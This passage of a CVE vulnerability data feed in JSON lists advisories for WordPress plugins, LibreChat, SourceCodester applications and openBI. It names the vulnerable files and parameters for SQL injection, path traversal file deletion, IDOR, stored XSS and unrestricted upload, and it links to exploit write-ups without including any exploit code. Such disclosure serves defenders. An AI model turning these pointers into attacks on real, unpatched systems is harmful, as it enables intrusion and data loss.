TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427957", "name" : "Submit #427957 | Sourcecodester Online Exam system using Django V 1.0 Improper Access Controls", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://drive.google.com/file/d/1hEXfbOOkWdYzaSI6ORQvPGBtn09R12Ui/view?usp=drive_link", "name" : "https://drive.google.com/file/d/1hEXfbOOkWdYzaSI6ORQvPGBtn09R12Ui/view?usp=drive_link", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in SourceCodester Online Exam System 1.0. Affected is an unknown function of the file /admin-dashboard. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This affects a different product and is a different issue than CVE-2024-40480." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:online_exam_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-25T00:15Z", "lastModifiedDate" : "2024-10-30T16:21Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10354", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281701", "name" : "VDB-281701 | SourceCodester Petrol Pump Management Software print.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.281701", "name" : "VDB-281701 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.430074", "name" : "Submit #430074 | SourceCodester Petrol Pump Management Software 1.0 print.php SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://github.com/K1nako0/tmp_vuln3/blob/main/README.md", "name" : "https://github.com/K1nako0/tmp_vuln3/blob/main/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in SourceCodester Petrol Pump Management Software 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/print.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mayurik:petrol_pump_management:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.9, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.2, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-25T01:15Z", "lastModifiedDate" : "2024-10-30T16:32Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10355", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281702", "name" : "VDB-281702 | SourceCodester Petrol Pump Management Software invoice.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.281702", "name" : "VDB-281702 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.430077", "name" : "Submit #430077 | SourceCodester Petrol Pump Management Software 1.0 invoice.php SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://github.com/K1nako0/tmp_vuln4/blob/main/README.md", "name" : "https://github.com/K1nako0/tmp_vuln4/blob/main/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in SourceCodester Petrol Pump Management Software 1.0. Affected by this issue is some unknown functionality of the file /admin/invoice.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mayurik:petrol_pump_management:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.9, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.2, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-25T01:15Z", "lastModifiedDate" : "2024-10-30T17:13Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10356", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" }, { "lang" : "en", "value" : "CWE-200" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3204333/element-ready-lite", "name" : "https://plugins.trac.wordpress.org/changeset/3204333/element-ready-lite", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0a48c91-7e2c-4708-b5af-dfbcfea08f83?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0a48c91-7e2c-4708-b5af-dfbcfea08f83?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.8 in inc/Widgets/accordion/output/content.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:quomodosoft:elementsready:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "6.4.9", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-12-17T13:15Z", "lastModifiedDate" : "2024-12-17T13:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10357", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-200" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e1fa3569-9a9a-4aa6-9057-c87601fadb9f?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e1fa3569-9a9a-4aa6-9057-c87601fadb9f?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/cafe-lite/trunk/src/widgets/class-clever-widget-base.php#L411", "name" : "https://plugins.trac.wordpress.org/browser/cafe-lite/trunk/src/widgets/class-clever-widget-base.php#L411", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Clever Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.1 via the getTemplateContent function in src/widgets/class-clever-widget-base.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-26T10:15Z", "lastModifiedDate" : "2024-10-28T13:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10359", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-915" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/danny-avila/librechat/commit/e3e52402f69accc35c6d0acd9c3266ae1cb6333f", "name" : "https://github.com/danny-avila/librechat/commit/e3e52402f69accc35c6d0acd9c3266ae1cb6333f", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/bba65eb4-4c83-4f33-83c1-ede5ed0d5656", "name" : "https://huntr.com/bounties/bba65eb4-4c83-4f33-83c1-ede5ed0d5656", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In danny-avila/librechat version v0.7.5-rc2, a vulnerability exists in the preset creation functionality where a user can manipulate the user ID field through mass assignment. This allows an attacker to inject a different user ID into the preset object, causing the preset to appear in the UI of another user. The vulnerability arises because the backend saves the entire object received without validating the attributes and their values, impacting both integrity and confidentiality." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:librechat:librechat:0.7.5:rc2:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-11T20:32Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1036", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/X1ASzPP5rHel", "name" : "https://note.zhaoj.in/share/X1ASzPP5rHel", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252311", "name" : "https://vuldb.com/?ctiid.252311", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252311", "name" : "https://vuldb.com/?id.252311", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://note.zhaoj.in/share/X1ASzPP5rHel", "name" : "https://note.zhaoj.in/share/X1ASzPP5rHel", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?id.252311", "name" : "https://vuldb.com/?id.252311", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252311", "name" : "https://vuldb.com/?ctiid.252311", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in openBI up to 1.0.8 and classified as critical. This issue affects the function uploadIcon of the file /application/index/controller/Screen.php of the component Icon Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252311." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openbi:openbi:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-30T18:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10360", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/eafe73b4-b492-45c7-adca-d9a3042144b4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/eafe73b4-b492-45c7-adca-d9a3042144b4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3176341/move-addons", "name" : "https://plugins.trac.wordpress.org/changeset/3176341/move-addons", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Move Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.5 via the render function in includes/widgets/accordion/widget.php, includes/widgets/remote-template/widget.php, and other widget.php files. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:moveaddons:move_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-29T11:15Z", "lastModifiedDate" : "2025-01-27T15:19Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10361", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-73" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/danny-avila/librechat/commit/0b744db1e2af31a531ffb761584d85540430639c", "name" : "https://github.com/danny-avila/librechat/commit/0b744db1e2af31a531ffb761584d85540430639c", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/e811f7f7-9556-4564-82e2-5b3d17599b2d", "name" : "https://huntr.com/bounties/e811f7f7-9556-4564-82e2-5b3d17599b2d", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An arbitrary file deletion vulnerability exists in danny-avila/librechat version v0.7.5-rc2, specifically within the /api/files endpoint. This vulnerability arises from improper input validation, allowing path traversal techniques to delete arbitrary files on the server. Attackers can exploit this to bypass security mechanisms and delete files outside the intended directory, including critical system files, user data, or application resources. This vulnerability impacts the integrity and availability of the system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:librechat:librechat:0.7.5:rc2:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.1, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.2 } }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-11T20:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10362", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/701f653b-a0c3-49b4-972e-f26c3633ad92/", "name" : "https://wpscan.com/vulnerability/701f653b-a0c3-49b4-972e-f26c3633ad92/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/701f653b-a0c3-49b4-972e-f26c3633ad92/", "name" : "https://wpscan.com/vulnerability/701f653b-a0c3-49b4-972e-f26c3633ad92/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Social Media Share Buttons & Social Sharing Icons WordPress plugin before 2.9.1 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:inisev:social_media_share_buttons_\\&_social_sharing_icons:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.9.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-09T18:18Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10363", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" }, { "lang" : "en", "value" : "CWE-284" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/danny-avila/librechat/commit/42a4d02c62e2a6cf677d1cb6cfcb36d136aaa599", "name" : "https://github.com/danny-avila/librechat/commit/42a4d02c62e2a6cf677d1cb6cfcb36d136aaa599", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/41a1137d-e725-4fec-b04c-58555cb16b6b", "name" : "https://huntr.com/bounties/41a1137d-e725-4fec-b04c-58555cb16b6b", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In version 0.7.5 of danny-avila/LibreChat, there is an improper access control vulnerability. Users can share, use, and create prompts without being granted permission by the admin. This can break application logic and permissions, allowing unauthorized actions." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:librechat:librechat:0.7.5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-11T20:09Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10365", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f7ce1d19-25fa-434d-943b-d10c5cb2ec51?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f7ce1d19-25fa-434d-943b-d10c5cb2ec51?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3186482/the-plus-addons-for-elementor-page-builder", "name" : "https://plugins.trac.wordpress.org/changeset/3186482/the-plus-addons-for-elementor-page-builder", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.0.3 via the render function in modules/widgets/tp_carousel_anything.php, modules/widgets/tp_page_scroll.php, and other widgets. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "6.0.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-11-20T07:15Z", "lastModifiedDate" : "2024-11-26T20:36Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10366", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-639" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/danny-avila/librechat/commit/a350443661d001ac55787741969a75d94ca14116", "name" : "https://github.com/danny-avila/librechat/commit/a350443661d001ac55787741969a75d94ca14116", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/cde47cf8-dc81-46ab-b472-f7e44a981a7e", "name" : "https://huntr.com/bounties/cde47cf8-dc81-46ab-b472-f7e44a981a7e", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An improper access control vulnerability (IDOR) exists in the delete attachments functionality of danny-avila/librechat version v0.7.5-rc2. The endpoint does not verify whether the provided attachment ID belongs to the current user, allowing any authenticated user to delete attachments of other users." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:librechat:librechat:0.7.5:rc2:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-15T11:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10367", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9d83c085-b33a-4003-9e0a-8457669d6634?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9d83c085-b33a-4003-9e0a-8457669d6634?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/otter-blocks/#developers", "name" : "https://wordpress.org/plugins/otter-blocks/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3178637/", "name" : "https://plugins.trac.wordpress.org/changeset/3178637/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-01T11:15Z", "lastModifiedDate" : "2024-11-01T12:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10368", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/ppp-src/CVE/issues/17", "name" : "https://github.com/ppp-src/CVE/issues/17", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281760", "name" : "VDB-281760 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281760", "name" : "VDB-281760 | Codezips Sales Management System addstock.php sql injection", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.430114", "name" : "Submit #430114 | Codezips Sales Management System In PHP With Source Code V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Codezips Sales 